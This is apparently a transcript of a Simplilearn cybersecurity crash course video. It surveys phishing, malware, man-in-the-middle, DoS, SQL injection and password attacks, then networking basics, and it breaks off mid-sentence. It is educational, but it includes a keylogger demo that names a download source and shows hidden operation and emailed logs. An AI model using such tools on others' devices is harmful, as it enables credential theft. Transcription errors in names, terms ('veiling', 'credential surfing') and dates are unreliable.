Cybersecurity is crucial to everyone from governments and MNCs to small businesses and individuals at home. A career in cybersecurity is one of the finest options available today. On that note, hey everyone, welcome to this session on Cybersecurity Crash Course by Simplilearn. In this crash course, you will learn all about cybersecurity and its concepts. For any of you out there who is new to cybersecurity, not to worry, we will be starting from scratch. We'll begin this crash course with the various types of cyber attacks along with a demo for each. Then we will move on to understanding why cybersecurity is necessary and what cybersecurity is truly about. After this, we will look into the concept of ethical hacking. Following this, we will give you an insight into the lucrative cybersecurity career. Next, we will brief you all about the world-renowned CISSP Certification. Finally, we will conclude this crash course by helping you with a set of the top 50 interview questions and answers that can be asked in a cybersecurity interview. For this training with me, I have our experienced cybersecurity specialist Bipin, and together we will take you through the various topics in cybersecurity. All of this in about 6 hours. So, let's start off with an interesting video on cybersecurity. But before we begin, make sure to subscribe to our YouTube channel and hit the bell icon to never miss an update from Simplilearn.
Meet Anne. She often shops from www.shoppingcart.com. She has her information like email ID, address, and credit card details saved on the website to enable a faster and hassle-free shopping experience. The required information is stored in a server. One day, Anne received an email which stated her eligibility for a special discount voucher from shoppingcart.com. In order to receive the coupon code, she was asked to fill in her shoppingcart.com account credentials. This didn't seem fishy to her at the time, as she thought it was just an account verification step. Little did she realize the danger she would be facing. She was knocked off her feet when a substantial amount of money was wiped off her account. How do you think this happened? Well, yes, the email she received was fake. Anne's shoppingcart.com account witnessed unauthorized access from a third party. This type of attack is known as a cyberattack, and the person who carries it out is called a hacker. Could Anne have prevented this attack? Indeed, she could have, with the help of cybersecurity. Cybersecurity involves techniques that help in securing various digital components, networks, data, and computer systems from unauthorized digital access. There are multiple ways to implement cybersecurity, depending on the kind of network you are connected to and the type of cyber attacks you are prone to. So, let's take a look at the various cyber attacks that Anne could have been exposed to. One of the most common types of cyber attacks is a malware attack like Trojan, adware, and spyware, to name a few. Had Anne downloaded any suspicious attachments online, her system could have gotten corrupted by certain malicious viruses embedded within the attachments. Next is a phishing attack, the type of cyber attack which Anne experienced. Here, the hacker usually sends fraudulent emails, which appear to be coming from a legitimate source. This is done to install malware or to steal sensitive data like credit card information and login credentials. Another type of attack is the man-in-the-middle attack. Here, the hacker gains access to the information path between Anne's device and the website's server. The hacker's computer takes over Anne's IP address. By doing so, the communication line between Anne and the website is secretly intercepted. This commonly happens with unsecured Wi-Fi networks and also through malware. Password attack is one of the easiest ways to hack a system. Here, Anne's password could have been cracked by using either common passwords or trying all possible alphabetical combinations. To prevent future cyber attacks, Anne sought to implement a few cybersecurity practices. First, she installed a firewall. As the name suggests, it is a virtual wall between Anne's computer and the internet. Firewalls filter the incoming and outgoing traffic from your device to safeguard your network, and they can either be software applications or hardware reinforcements. Secondly, Anne implemented honeypots. Just like how flowers attract bees, dummy computer systems, called honeypots, are used to attract attackers. These systems are made to look vulnerable in order to deceive attackers, and this, in turn, defends the real system. In addition to these, she also decided to use unique alphanumeric passwords, antivirus software, and started avoiding mails from unknown senders. That was Anne's story. Cyberattacks are not just confined to individuals, but also to public and private organizations. The cyberattacks carried out in such places are more deadly, and they result in colossal losses. Motives of such attacks are many, starting from tampering with crucial data to monetary gains. Let's have a look at a few of the cyberattacks that companies are subjected to. Various public sector organizations and large corporations face the Advanced Persistent Threat, APT. In this form of attack, hackers gain access to networks for a prolonged period in order to continuously gain confidential information. Companies also witness the Denial of Service Attack, where networks are flooded with traffic, which in turn leaves legitimate service requests unattended. A variant of this is the Distributed Denial of Service, DDoS attack, when multiple systems are used to launch the attack. When a hacker manipulates a standard SQL query in a database-driven website, it is known as a SQL Injection Attack. By doing so, hackers can view, edit, and delete tables from databases. Amidst a plethora of cyberattacks, it is indeed a challenge for organizations with several networks and servers to ensure complete security. This is not an easy task, and to help with this, cybersecurity professionals are hired to work on identifying cyber threats and securing a company's network. There are multiple job roles in the field of cybersecurity. If hacking fascinates you, then the role of an ethical hacker is something to be explored. Such professionals try to exploit a network's vulnerabilities, just like how a hacker would do, but only to identify those vulnerabilities and resolve them for protection against an actual cyber attack. But if you are looking to design robust security structures, then the role of a security architect is more apt. A Chief Information Security Officer, CISO, plays a crucial role in enterprise security and is entrusted with the overall safety of the information in an organization. With the increase in the production of global digital data, it is anticipated that cyber attacks will quadruple in the near future. Organizations are going to need cybersecurity professionals who can prevent these attacks. A career in the field of cybersecurity is lucrative and a very smart decision for professionals now. So, what are you waiting for? Get certified with Simplilearn and become a cybersecurity expert.
Let's begin with the rise in cybercrimes. So, let's talk about WannaCry. This is something that happened way back in 2017. Let's not say way back, it's just 2019, 2 years back, and it took the world by storm. So it was a cyber attack which encrypted the data of organizations, and then the hackers held that organization ransom by demanding money from them to decrypt their own data. So what exactly happened? The attack originated in Asia and then spread across the rest of the world. Note the date. And how did this happen? There was a vulnerability that was identified in Microsoft Windows, the SMB vulnerability. SMB, which is server message block, is essentially the file sharing and the printer sharing services that you use in a LAN environment on Windows operating system. By default, these are enabled on your desktops, and there is a hardening guide that people utilize to either upgrade the version of SMB to a more secure version or to disable SMB and utilize something else. Now, this was a known vulnerability, and this was targeted. Within days. More than 230,000 computers were infected across 150 countries. Now, when we say this was identified, Microsoft knew of this vulnerability, and in fact, they had released a patch in April of 2017 to mitigate this vulnerability. Within 2 months of that release, this attack had happened. Now, in a real world scenario, it is not possible for all the servers and devices to be upgraded to the latest patch level, because organizations need to test those patches to see if those patches are going to interfere with the services that they are providing. And hence, no organization will be completely patched up at any point in time. And this was the flaw that sadly took down a lot of organizations. The patch was available, but it was under testing. Some were not utilizing it yet, and they did not see it as a high value risk. And suddenly something happened and WannaCry took place. Now, what happened was a crypto worm called WannaCry, which basically encrypts the data and locks the user out of their own computers. And they get a screen in front of them which says your data has been encrypted, and it gives them a link, and they demand $300 to $600 to be paid to the hackers to retrieve the decryption key for their data. Now here, obviously you're not going to pay cash to hackers, neither are you going to make a bank transfer, because both of the ways you can identify the hackers and then pursue them. So the hackers demanded this exchange via bitcoins, cryptocurrency. This is the best way to remain anonymous and the best way to make payments over the internet without being identified. So what was the impact of the attack? Around 200,000 to 300,000 computers were infected. Now it sounds like a small number of computers when we're talking about global. However, the services that it affected were huge. In UK, the National Health Service got affected, all the databases got encrypted, surgeries and treatments of patients were postponed. FedEx, Renault, Nissan, all of these organizations got compromised and their production lines basically shut down for a few days till they retrieved data from backup, started to restore, and then tried to bring back everything to normal. Then, in February 2019, Dunkin' Donuts announced that the users of their reward programs were targeted by a credential surfing attack. That means that the attackers stole the credentials, usernames, and passwords of customers of Dunkin' Donuts. Now we think Dunkin' Donuts, they sell donuts, how much could it impact anyone? But if you have an online account with Dunkin' Donuts, you also have your personal identifiable information stored in those accounts. For example, your name, address, credit card information, maybe your social security number or your national insurance card or something like that, which can lead to identity theft. People can misuse that information, pretend to be you, and then take out loans or do transactions in your name where you are going to end up paying those bills. So stealing of such kind of data is going to impact all the users adversely. So the first name, last name, and email IDs were stolen. That is still good enough to launch social engineering attacks and target these victims to phishing attacks or similar attacks. So now let's look at the different types of attacks in cyber. So we are going to discuss these 6 malwares. We are going to talk about social engineering attacks, man-in-the-middle attacks, denial of service, SQL injections, and password attacks. Now if you look at this, malwares basically target hosts, operating systems. Social engineering attacks would address or attack the gullibility of a human being with the help of a computer. For example, sending a fake mail or hosting a fake website. Man-in-the-middle attack would target a network and then try to capture data packets within the network, thus compromising your credentials. A denial of service attack would crash a service. SQL injection attacks would attack an application, and a password attack would attack the usernames and passwords of accounts, thus taking advantage of weak passwords and getting access to your accounts. So let's start with malwares. Malware basically refers to malicious software. The first part of malicious, mal, and the ware out of software becomes malware. Malwares are nothing but vehicles in which hackers embed payloads. Payloads could be viruses, worms, ransomwares, trojans. So they hide these kind of malicious softwares within legitimate looking softwares and they post them on the internet. People who are interested in those kind of softwares will obviously download them, and since they're looking very legitimate, they will try to install them, thus accidentally and unknowingly installing a Trojan, virus, or a ransomware on their machine. Now, most of us have done this at one point in time where we have looked at pirated software because we did not want to pay for it. And then we probably go to torrents and then search for those softwares, download them, and there's a keygen.exe over there which we have to execute. And then we have to copy that code, the exe file that comes out with the keygen, and then we have to replace it. And I mean, it's a very convoluted process. But the fact that you have to restore some code with some other code would basically mean that there is something wrong with that file. So 99% of the time, these programs would have viruses or trojans embedded within them, and it is going to affect the security posture of your computers. If you scan keygen.exes with any antivirus across the globe, they will always report them as malwares, and they will probably want to delete those kind of files. So how do these get infected? It gets infected into a system when the user clicks on a suspicious link. Now, obviously, if you think it is a suspicious link, you're not going to click on it. But you trust the link or you're compelled to click on it just out of curiosity. Let's say you click on that link, there's a redirector, it downloads an attachment from a malicious server and it gets installed on your machine. Most of the common ways a virus or a worm is spread is through USB devices. People pass around USB devices like nobody's business, and you have no idea where that device has been used before, and you plug into your machine, and if there is a virus on that USB device, it will get infected on your machine as well. Malwares are nothing but malicious softwares that pose as legitimate softwares but will have a virus, trojan, or a worm embedded within it, right? It could also be a keylogger. A keylogger is nothing but another software that is created to catch all the keystrokes that the user is making, create a copy of it and store it and send it back to the hacker. So whatever the user is typing, it will now be known to the hacker. It could be bank details, passwords, any personal information that the user might want to keep secret. We are going to look at 3 different demos here. This demo is just to showcase a couple of things. We are going to look at a keylogger, how a keylogger works, this virtual machine here, and I've already downloaded a keylogger and installed it. The idea of this demo is to showcase how a keylogger functions, right? So you can see online on the screen, we are using a free keylogger.en.softonic.com. We are on this site and you can download the free keylogger right from here. What I've done using my demos is that I've always have a keylogger running in the background to capture all the keystrokes that I've been doing whenever I'm doing any demos. So this keylogger here can actually be hidden in the taskbar, but for our demo purposes, I've kept it visible. When you click on it, it will open up and give you a basic screen where you can start navigating about the keylogger. Now you can see that on 8th, which is today, it already shows some keystrokes, applications, and some visited websites. As you can see, already been browsing using the browser over here, and which has been recorded by the keylogger in the background. And just to give you an example, if I click on this file, you will see all the keystrokes that I have been doing so far. And you can see I've gone to this, I've opened up my Mozilla Firefox, I've typed in a search keyword of free keylogger. Then I've gone on to the website howsecure.ismypassword.net, in which I may have tried out a few passwords myself. And then I've gone and copy pasted this URL into the browser window, and you can see all of this has been recorded. And just to emphasize on that, let's go on to another website, and let's go to facebook.com. I'm not actually going to log in. I'm just going to type in a random username. So someone at simplilearn.com and a password like asd@1234. And I'm going to try to log in. Obviously the login is going to fail because this account doesn't exist, but we want to see what happens in the background when the keylogger picks up the keystrokes that we have typed. So let's open up the keylogger again and go and see what is there in the keystrokes and clipboard. And you can see over here that we typed in facebook.com, enter, and then we did not type in the username. That's the difference here. We selected it from a drop down. So a keystroke logger or keylogger has not been able to capture that input. A keylogger in its essence is only records something that has been typed in by the user real time. Since we did not type in the username, it did not record that username, but we typed in the password, and you can see the password over here, asd@1234. And this is how a keylogger works. It only captures the keystrokes that have been typed in real time. So if we use this exercise on our victims and they're just using drop-down menus, at that point in time, none of the data is going to be recorded. For that activity, you would need something which is known as spyware, which would capture screens, which would capture all of this information that is going on. Now, apart from just logging keystrokes, what this software also does is it also has a list of used applications. You can see all the applications that have booted up along with the operating system and the ones that have started up after the operating system has booted. It also has a list of the visited websites. So you can see these are the websites that we have been visiting, and they have been listed right here. The last one being Facebook, login or sign up, right? So this can store history for a really long time. If I go back in time and if I look at some of the demos that I've been looking at, so on 14th of September, these were the keystrokes that I utilized when I was doing some trainings or while I was providing some demos on other topics. So a keystroke or a keylogger will store all that information and keep on recording it till you actually delete that data, or you can reset the keylogger. You can also set up the keylogger to send an email to you on a daily report to a particular email address that you have sent. So as long as it detects the internet connectivity, this keylogger will send you an email to the email address that you have specified with all the keystrokes that it has logged. Now this is the free version. There's again a paid version for it. So you can go and visit this site and see how this keylogger functions. If I press on the X button over here, it will ask me if I want this to be hidden in the system tray. If I click on yes, it only using this shortcut will I be able to invoke this screen. So just for demo purposes, I do not want this to be hidden. So I'm going to click on no, and you can see that the keylogger is still visible over here. So that was the first demo that we are seeing. Viruses, as we all know, are destructive programs that once executed would destroy data or harm the hard disk or the partition tables. Worms, on the other hand, would be softwares that would be more of a nuisance value. where they're going to replicate themselves in such a way that they would consume the resources of a computer, thus crashing the computer and then requiring a reboot. A Trojan horse is another software that will allow a backdoor entry or a covert channel to the hacker, where the hacker in this case would then be able to gain access to the victim's machine through the covert channel or the backdoor without the knowledge and the authorization of the user themselves. Let's talk about social engineering attack. Now, this is where your people skills come into the picture. This is the art of manipulating people and convincing them to give up confidential information, either knowingly or unknowingly. So most likely, we trust our friends, right? And we talk to them a lot and we give out some confidential information which we would not give out to others. What if somebody is pretending to be our friend just to get this information out of us? And we trust this person, we give out that information, and we suddenly get affected because of that. Now, I'm not saying that everybody in the world does that, but it is one of the most common attacks that is experienced in the computing world. Now, social engineering attacks can be broken down into three categories. First is a phishing attack. Don't worry about that figure over there. You're actually not going to go phishing. It's basically what known as a phishing attack. Then there is a spear phishing attack, and then there's a veiling attack. All of these are types of social engineering attacks where you're targeting a user by sending out fake mails or fake websites, and their gullibility into clicking on those links and then giving out information. So, what is a phishing attack? It is a practice wherein a hacker usually sends fake mails which look really genuine, or hosts fake websites which also look genuine and looks like they're from a trusted source. Once you click on those links, there would be embedded scripts or embedded malwares which would then be executed and then get installed on your machines, compromising the security of your device. These utilities could be used to steal credit card information, steal data from your computer, upload data to your computer, use your computer as a bot, and anything and everything that the hacker might want to do. Spear phishing is a variation of phishing. Now, phishing is a non-targeted attack. It is to the whole world at large. Whoever becomes a victim becomes a victim. However, spear phishing is a targeted attack. It is to a specific individual or to a group of individuals in an organization. So, it becomes a customized attack. You identify the victim, you identify the flaws that are existing over there in the organization, you identify the gullibility of the victim, create that fake mail to suit that particular situation, send it across to them. They'll click on that link and get infected by whatever payloads that you have embedded within it. Veiling is when you are targeting particularly wealthy or powerful people in the industry. So normally when you're targeting CEOs, CFOs, high-level management people of an organization, it would be known as a veiling attack. So here the example is where the email has been received. Dear customer, your account is going to expire today. To keep your account activated, please click on the link here and proceed with the verification process. Now here the link that we see, activate.com, would be a hyperlink which is going to mask the actual URL where the link is going to redirect us. Right? Here the attack is on the gullibility of the customer, where they would fear that the account would be deactivated, and to prevent that, they would trust this email, click on the link, and then provide the information, thinking that they're just reactivating their account, but they're actually leaking their own information to the attacker. So the first thing you have to understand is banks or any organization are not going to send you any emails with a link in it asking you to reactivate or anything like that. In fact, banks proactively tell us that they're not going to call us and ask for any information. In fact, they would want us to call them on their registered number or the helpline number that they have declared on their website or on the cards that we possess. This is something very common in today's world. This is basically where the prey is the human itself. And the reason social engineering attacks are very successful is because of the gullibility factor that a human has. For example, human has something called emotions that a machine wouldn't. You could plead with a human for a password to be reset by gaining sympathy or empathy. But try doing that with a machine, those attacks are going to fail. Social engineering attacks are not only limited to those, but we can talk about phishing. Phishing is also a part of social engineering attack, where the gullibility of the user to click on that link is being exploited. In this scenario here, this is Clark. He is calling from the ID security team. That means that he is impersonating probably, and then telling the victim that the system has been compromised. Please share the password with me. The victim, on the other hand, thinks that the person is trying to help her, probably doesn't verify that person, trust that person, and then provides the password over the phone. Now here, It is fear that is being exploited, because the password being compromised would clearly upset the end user for loss of data or for the computer revealing out confidential information. Thus, here she's trusting the IT security team for the password to be reset and given back to her. Then we come to the network attacks, man in the middle. This is also known as an eavesdropping attack, which literally means that you are going to listen in on to somebody's conversation. For example, in the figure, the client is trying to talk to the server, but you become a man in the middle and you try to listen in on the conversation that is going on. Now, obviously, the conversation over here may not be audio, but be data that is being exchanged between the server and the client. You just listen in, you make a copy of that data and you store it at your end. The data could contain usernames, passwords, may contain confidential information and help you compromise data. The attacking computer takes the IP address of the client. So you find out the IP address of the client. The client is not aware about this. The client is trying to communicate with the server. You spoof yourself as a default gateway or a trusted device, and the client thinks that it is through you that they need to communicate to the server, and thus they start sending data via your PC. So this attack normally happens on public Wi-Fi networks. I've seen that happening a lot, and thus I never recommend anyone using those public Wi-Fis. For example, you go to a coffee shop, they have free Wi-Fi over there, you connect to it and you start surfing, you start browsing. You are always signed into Google, Facebook accounts, your bank accounts and whatnot. And then there's a sniffer, there is a hacker who's doing a man-in-the-middle attack, capturing all that data. Now, it's not an easy attack, but it can be done. So this diagram shows where the man-in-the-middle attack has become successful, and now that the client and the server both are sending information via the attacker without knowing that the attacker is capturing all that data. Here, suppose you're in trouble and you need money right now, and you call your friend and ask for money. So here the person is calling John, telling John that they're in trouble, and they're asking for John to give their credit card number over the phone. Now, this is a legitimate transaction. The friend is actually calling John and asking for some help. However, when John is providing that help over the phone with the credit card numbers, maybe the CVV number and all of that, and then the OTP at the end of it, at the same time, there could be a hacker doing a man-in-the-middle attack where they could be eavesdropping on whatever is being said or whatever data is being transferred. And once they capture this confidential data, they can then misuse that data to their own gains. Then comes the denial of service attack. The motive in a DOS attack is not to benefit monetarily, but to bring down a service for legitimate users, thus just causing harm to the organization. For example, if I consume the bandwidth of to a particular website, since there's no more bandwidth left, other legitimate users who want to interact with the website will not be able to connect to the website, thus creating a denial of service to those legitimate users. Now, it may not be possible for me to use my laptop to target a cluster of servers, because obviously the bandwidth at the other end would be very high. So I would distribute my attack across multiple devices, thus creating a distributed denial of service, also called a DDoS attack. Then we come to the SQL injection, or SQL. SQL stands for Structured Query Language, which is the de facto language that is used by applications to interact with databases. So let it be a Microsoft SQL database, MySQL database, Oracle SQL. The syntax may be a little bit different, but it is still the structured query language that applications utilize to interact with the database. Now, the queries that are created by the applications need to be sanitized at the application level itself. So developers need to be very careful of how they are going to create those queries, what queries are allowed to go to the database, because a database is designed to answer queries. It doesn't know what is a legitimate query and what is a illegitimate query. If it receives a query, it is going to try to execute it and give out information. Thus, a hacker may insert malicious queries or malformed queries into a SQL server through the vulnerable application, causing a security event. So, depending on the queries that have been created, the attacker could delete some data or modify data, add data, edit it, or do anything that is malicious in nature that would compromise the integrity and the security of that database. For example, the Dunkin' Donuts, right? Except apart from being a credential attack, since they got access to the database, they could have added or deleted any information about any users that were there. As the name suggests, this attack is used to crack or get the password for user's account. When we say crack passwords, this is basically where somebody is trying to brute force, or they're trying to guess the password and they're going to break the password, thus getting access to your accounts. There are 5 different ways passwords can be cracked. The first one is a dictionary attack, where we use every password that is possible through the dictionary. Now this is the use of an actual dictionary, and that's one of the reasons when we try to create passwords, we are advised not to create passwords based on dictionary words, because these are easily guessable and there are lists already out there that contain all of these words. There's a tool that you can utilize, and that tool will then parse through each and every word that is in the dictionary file and then compare it to a possible password. If one of the words matches, the password has then been compromised. So if we are observing a little bit higher security where we have created a password that is not based on a dictionary word, then we want to look at other attacks like brute force. It is a trial and error method. So basically what we do is we identify how the passwords were created. For example, in today's world, the policies would be to consume in a password any of the alphabet characters A through Z, uppercase or lowercase, 0 through 9, and then special characters. And then we want to randomize the usage of these characters so that they are not easily guessable. But a brute force attack at the same time would then try every permutation and combination there is possible in the entire character set and then try to figure out the password. Now this takes a really long time and does take a lot of compute and storage power, and that's where the botnet example comes back in, the one that we saw earlier, which was used for DOS attack. But similarly, if I've infected multiple computers like this, I can then distribute this attack onto all those computers and use the entire compute power that is available to shorten the time that is required to crack the password. Now, this is 100% successful given the time that it may take. So if the time that is going to take is going to be 100 years, the attack becomes unsuccessful because during that period, the password is most likely to be changed, the technology is going to be changed, and so on and so forth. So if the password is easily guessable, this can be a very easy attack to perform. Then a keylogger, which is a similar attack to what we have seen. So a keylogger, as discussed earlier, is nothing but a software that once installed on your machine would grab each and every keystroke that the user has made and store it in a file which the hacker can later on access. So whatever you have been typing, passwords, credit card information, or anything else, all of those would be recorded and stored in a file, and that's one of the best way a password can be compromised. Then shoulder surfing. This is a physical attack rather than being a technical one. Here you need to physically be present when the user is typing in their password, and you actually look over their shoulder to see what they're typing and try to figure out what the password is. If they are quick typers, it is going to be a little bit more difficult. If they are slow typers, it's going to be that much more easy. And the last one is called a rainbow table. Now, passwords, when applications store them, are stored in hash format. Hash is nothing but a one-way signature that is created of the password file, of the word that is used for the password, and it is based on an algorithm. So the input could be of variable length. For example, a password could be 7 to 14 characters, but the output of a hash value would be fixed based on the algorithm that you're consuming. So most common algorithms in today's world that we utilize are SHA, secure hashing algorithms. Before that, we used MD5 or message digest. So all of these convert the passwords from plain text into a hash value and store it into a database. So if you actually attack that database to grab a password, you're going to get the hash value, not the password in clear text. And thus, in that scenario, comes the rainbow table to the rescue. A rainbow table is nothing but a file that will have the list of all possible passwords along with their hash values in the required format. So if you remember the dictionary attack was nothing but a list of words based on the dictionary that were stored in a file, and then the software was just trying each and every word against a possible password. Here, we do not have the word, but we have the hash value. So to reverse engineer hash value, what we created is, we created a rainbow table where there would be a list of all the possible passwords and their corresponding hash values. So we then compare the hash value that we have captured and then search for that hash value in the file that we have created. The hash value that matches the corresponding word to it is the password in clear text. So these are the 5 types of password attacks. Now let's talk about the types of network attacks. An active attack is an attack when the intruder attempts to disrupt the network's normalcy and modifies the data and alters the data at the same time. So as you can see in the diagram, there's a sender and there is a receiver. The attacker is the man in the middle who is now trying to create the active attack. So when the sender sends that data to the receiver, the attacker intercepts that data, modifies the data, and then sends the modified data to the receiver. Since the attacker is a man in the middle, as we have seen in the previous attacks, the receiver, neither the sender, would be aware of the attacker, and thus they would not be aware of the modification that has been done. In a passive attack, the intruder just eavesdrop on the data. They just listen in onto the conversation, but they do not modify the data at any time. So they just capture the packets, they copy the contents so that they can use that at a later stage. Let's look at the history of cybercrime. So as you can see, this graph shows us how cybercrime has progressed over the years. In 1990s, MNC database, Pentagon and IBM were hacked. Again in 1990s, national crackdown on criminals, Microsoft NT operating system pierced. So this is where hacking started becoming more mainstream, right? Before this, hacking was very much limited to organizations who used computers. But in the late 80s, internet happened, and then we had e-commerce coming in, which basically led to our online retail stores, online banking, and online data stores as well, which then led to criminals hijacking this data or hijacking your money and trying to steal it on the internet itself. In 2001, cybercriminals launched attacks against eBay, Yahoo, CNN, Amazon, and other organizations. 2007, this was where one of the biggest bank hacks had happened. Swedish bank Nordea, they recorded at least $1 million being stolen in 3 months from 250 accounts. 2013, Adobe had 2.9 million accounts compromised and their usernames and passwords released on the open internet. In 2016, Kaspersky, one of the leading antivirus providers to the world, reported around 758 million malicious attacks that occurred, which they identified themselves. These are some of the most famous faces in cybersecurity or earlier cybercrime. In 1988, Robert Morris, he's an American computer scientist and entrepreneur. He's best known for creating what is called the Morris worm, and this was way back in 1988. And this is the first computer worm that has been identified on the internet. Kevin Lee Polson. In 1990, he was accused of hacking into a Los Angeles radio station called KIIS-FM, where there was a contest going on. And if you're a particular number of caller and give a correct answer, you're supposed to win a Porsche 944. And he hacked those telephone lines, ensuring that he became that particular person and answered the question correctly. It was later on revealed that this actually happened. He was jailed for it. Then comes David Smith. David Smith, he created the Melissa virus. Now, Melissa virus, one of the most dynamic viruses known, around March 1999. That's when this happened. This virus was released, and this was a macro-based virus which affected Microsoft Word and Outlook-based files. Adam Botbill, in 2004, he's also an American computer hacker from Michigan. He gained unauthorized access to Love's corporate computer network via an open, unsecured, wireless access points. Now, these access points back then were not that much secured. These people were able to identify it. What they tried to attempt by doing that was gain access to the company's network and install a software which would then help them capture credit card information of that organization. Right, and this was later on identified as well, and he was prosecuted for that crime and got jailed. Just a matter of trivia, Kevin Lee Polson, he was one of the first people found guilty and was banned from using computers and the internet for 3 years after his release. In today's world, we cannot even imagine living without the internet. This guy lived for 3 years without it. Now let's go a little bit further and see what would motivate people for committing such cybercrimes. Right? The first and foremost motive is disrupting business continuity. Others would be looking at data theft or information theft and manipulating that data to gain from that data. So if I'm able to access your computer and steal some data that has some value to you and sell it or make it public, you would be at a financial loss because that data no longer has any value. Creating fear and chaos by disrupting critical infrastructure. For example, a company's infrastructure crashes, the services are no longer being offered by that organization, and people start panicking, start fearing an attack by cybercriminals, and it leads to chaos. Financial loss to the target, which is very obvious. If I do a denial of service attack, or if I make a service unavailable from an organization, what is going to happen is, since that service is not functioning, the company is not going to make any money out of it and thus going to suffer a financial loss. Achieving states' military objectives, one country spying on another country, trying to gather information about their military intelligence, military activities, or any other activities that can harm the original country. Demanding ransom, hackers can encrypt your data and then demand a ransom from you in lieu of decrypting the data again. Damaging reputation of a target, impersonating a user on the social media platforms, making false statements, thus damaging the reputation of that person, and propagating religious or political beliefs. Religious fanatics, promoting whatever cultures that they want to promote, trying to gain more followers, thus bringing more unrest to the world. Any of these could become motives for cybercrime. So, this is why we want cybersecurity. Cybersecurity should be in place to prevent these kind of attacks. So, what exactly is cybersecurity? It refers to the practice of protecting networks, programs, computer systems, and their components from unauthorized digital access and attacks. So, whatever your digital footprint, could it be servers, computers, switches, routers, web servers, web applications that you're hosting over there, services that you're consuming from the cloud or providing to other customers, you need to secure all of these to ensure that the integrity and the confidentiality of these services is intact and none of these services are affected by any cyber attacks which could lead to disastrous results. So the main difference we want to understand here is the difference between cybersecurity and information security. Information security is data within the organization where they handle sensitive information or proprietary information, copyrighted or patented information, and they want to secure it from data leaks or having that data in somebody's computer's hands. Cybersecurity is basically a technique used to protect the integrity of networks. So this is when you're going to go on the web and on the internet, you're going to secure your devices that you have deployed, allowing people to access your infrastructure from the outside. So, what could be the cost of not being cyber secure? If you get hacked, or if your data is compromised, or if your information is compromised, you could have a lot of repercussions. Your goodwill will go for a toss. You may be open for lawsuits, not only from clients, but from customers as well. You could be open for fines or penalties from government organizations for failing to follow the law of the land. Customer trust will obviously be hampered. If you have been hacked and your data has been compromised, you wouldn't want to deal with that organization in the future. All of this could land the organization in a financial crisis where all the lawsuits and penalties that are being imposed could basically bankrupt that organization and thus take it out of circulation. So now let's look at some basic terminologies which we need to understand to go further in the cybersecurity world. First and foremost, network. What is a network? Network is nothing but a group of interconnected devices. Could be servers, could be workstations, could be laptops, could be any devices, file printers and whatnot to be interconnected with each other. As you can see in the diagram, it is used for communications. It's primarily used for data transmissions and to communicate between various terminals so that the business can go on. It is also used to share data and information. It could be wired or wireless. So you got a wired LAN, or at home we all have wireless networks where we connect all our devices. We use them for streaming videos. We use them to connect to the internet, surf websites, work from home. So we've got office also set up on our Wi-Fi. So a network is nothing but a collection of interconnected devices that are allowed to communicate each other freely so that the business can be continued in a proper manner. Server. A server is nothing but a hardware device that is supposed to handle requests of data information, allow network services to function from other computers and devices. So this is where we build a client-server relationship, where on the server we've got the major software, we got the data that is stored over there, and clients then interact with the server to consume that data in a particular manner that would help them make sense and analyze that data and generate business out of them. Then the internet. Internet is nothing but the collection of multiple networks globally. So all the networks that we have across the globe, when they are interconnected with each other, that is what internet is. And if we just go back and we talk about servers, this is what allows the internet to be formed. So every organizations, when they publish their servers on the internet and they allow everyone to interconnect through those servers, that is where the internet comes in, being the servers being the backbone of the internet. Obviously, for the servers to communicate with each other, we will need switches, routers, and other devices for the data transmissions to happen. So these are the multiple networks, could be individual networks, interconnected together would form the internet across the globe. For the internet to work, there would be a set of protocols for transmissions to be allowed across the globe. Now, this is where TCP/IP, or the Transmission Control Protocol over Internet Protocol, comes into the picture. So if you remember, we use communication channels like TCP, or the Transmission Control Protocol, and UDP, User Datagram Protocol. When we connect to web servers, we talk about the HTTP protocol and HTTPS protocol if we want it secure. Then we'll talk about IMAP, POP3, and all of these protocols. Now, where do these protocols come from? It is nothing but a suite of the TCP/IP software which contains all of these protocols which allow computers to communicate with each other. If TCP/IP wouldn't have been there, our network would have collapsed. Now, when we have TCP/IP and we want to communicate across the globe, how would we identify devices on the internet or even on the intranet? Because the devices don't know us. They are not going to use our usernames and passwords to communicate with each other. But when I want to connect to a website or a device, how do I identify it on the intranet or the internet? I obviously use IP addresses. Now, IP addresses are nothing but the internet protocol addresses, which are 32-bit addresses, which look exactly like the one shown on your screen, 172.16.254.1. Now, there is a lot of classification of IP addresses, and some of these IP addresses work on the internet. Some of them are supposed to work on private LANs, but we'll reserve that for a later topic. Then, the second way that we are identified on the internet or the intranet are with MAC addresses. So, media access controls or MAC addresses are hard-coded addresses that are given to our network interface cards. These cannot be modified physically at any point in time. However, there are techniques to spoof MAC addresses which we can then obfuscate our existing address and give us a new one. That would again be discussed in a later lecture. A router. We've been talking about routers and switches. A router is nothing but a device that passes packets back and forth across networks. It routes the data in the appropriate path. So it is an intelligent device. It can understand IP addresses and MAC addresses. It can identify different paths of reaching a particular network. For example, if I'm sitting in India and I want to communicate across the world to America, there would be a specific path that needs to be followed for my data packet to reach the other side of the world. It is the routers that would map this path, store it in their cache. So when I try to connect to that server, they would retrieve it from the cache and send the packet across the globe. So the home router that we use at home on Wi-Fi is our default gateway to connect to the internet, and thus it allows our internal devices to communicate with each other using internal IP addresses. And when we want to go to the internet, it will then route the traffic on the internet and send the packet to other servers that we want to communicate with. Now, what is a domain? A domain is referred to as a group of computers and other devices that are interconnected and treated as a whole. Now, a domain is used by an organization. So let's say if I am XYZ, XYZ being the name of the organization, and I want to create a domain which will allow me to create a group of interconnected computers for my employees to interconnect with each other and send and manage data. I'm going to create a domain for my organization and attach all the devices, create users, and interconnect them using a domain. So this is where you're going to have a centralized approach of a server-client relationship, where you're going to have a main domain and you're going to have devices connected to the domain. Now, when we go onto the internet, the domain name is nothing but the base part of a website name. So when you say google.com and you type it in your browser, you're taken to the web page called google.com, which is the search engine that you're connected. But for Google, the organization, at the other end, they would have a data center over there which would have all that relevant data which allows you to search through that information. So for them, the domain would be the internal part where they have got this cluster of servers creating a data center where all that information is stored. But for us as consumers, a website called google.com would be a domain for us to visit that particular website and consume the services that they're offering on the internet. So here the example is HTTPS, which means that it is a secure website, port 443, and we're connecting to cybersecurity.com. Cybersecurity.com becomes the domain name. HTTPS becomes the protocol that we want to utilize to connect to that particular website. Then we come across DNS, or the domain name system. It is nothing but an index, something like a phone book, which is responsible for mapping the domain name into its corresponding IP address. Now remember, I said that there are only two ways we are identified on the internet or the intranet, either the IP address or the MAC address. if it is devices, if it is computers who are talking to each other, it would obviously be IP addresses. But if I type in google.com, I'm giving it a domain name. The internet does not understand domain names. So there is a DNS, a server, which is an index or works like an index or more like a phone book, which will have a list of all the domains with their corresponding IP addresses. So whenever I type in google.com, the request goes to a 